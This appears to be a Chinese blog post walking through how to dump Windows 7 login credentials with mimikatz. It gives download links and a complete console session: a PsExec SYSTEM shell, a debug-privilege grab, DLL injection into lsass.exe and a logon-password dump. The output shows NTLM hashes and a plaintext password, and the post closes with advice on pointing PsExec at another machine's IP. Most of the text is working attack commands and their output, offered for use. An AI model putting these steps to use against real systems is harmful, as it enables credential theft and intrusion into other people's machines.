用mimikatz来获取win7的密码

mimikatz下载地址:

http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.zip

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip


blog.gentilkiwi.com应该是法国佬的博客。


用mimikatz来获取win7的密码:


Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\Administrator>cd C:\mimikatz_trunk\tools

C:\mimikatz_trunk\tools>PsExec.exe \\127.0.0.1 cmd.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>cd C:\mimikatz_trunk\Win32

C:\mimikatz_trunk\Win32>mimikatz.exe mimikatz.exe
mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privil猫ge : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connect茅 脿 un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des donn茅es de s茅curit茅s dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;395889
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKL
        msv1_0 :        lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }
        wdigest :       yang
        tspkg :         yang

Authentification Id         : 0;155584
Package d'authentification  : NTLM
Utilisateur principal       : ANONYMOUS LOGON
Domaine d'authentification  : NT AUTHORITY
        msv1_0 :        n.t. (LUID KO)
        wdigest :       n.t. (LUID KO)
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;75419
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKL
        msv1_0 :        lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }
        wdigest :       yang
        tspkg :         yang

Authentification Id         : 0;997
Package d'authentification  : Negotiate
Utilisateur principal       : LOCAL SERVICE
Domaine d'authentification  : NT AUTHORITY
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;996
Package d'authentification  : Negotiate
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUP
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;40847
Package d'authentification  : NTLM
Utilisateur principal       :
Domaine d'authentification  :
        msv1_0 :        n.t. (LUID KO)
        wdigest :       n.t. (LUID KO)
        tspkg :         n.t. (LUID KO)

Authentification Id         : 0;999
Package d'authentification  : NTLM
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUP
        msv1_0 :        n.t. (LUID KO)
        wdigest :
        tspkg :         n.t. (LUID KO)

mimikatz # exit
Fermeture du canal de communication

C:\mimikatz_trunk\Win32>


wdigest后面的就是密码。如上所示,我的win7的Administrator的密码是yang。


工具的作者的blog:http://blog.gentilkiwi.com/mimikatz


解释:

privilege::debug  //提升权限


inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"   //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!


@getLogonPasswords  //抓取密码


exit  //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环


另外,我测试的时候,是在win7上测试的。还可以在XP上来连接win7,只需要修改一下IP,例如:

PsExec.exe \\192.168.1.123 cmd.exe

把上面的192.168.1.123改为目标的IP。

你可能感兴趣的:(工具)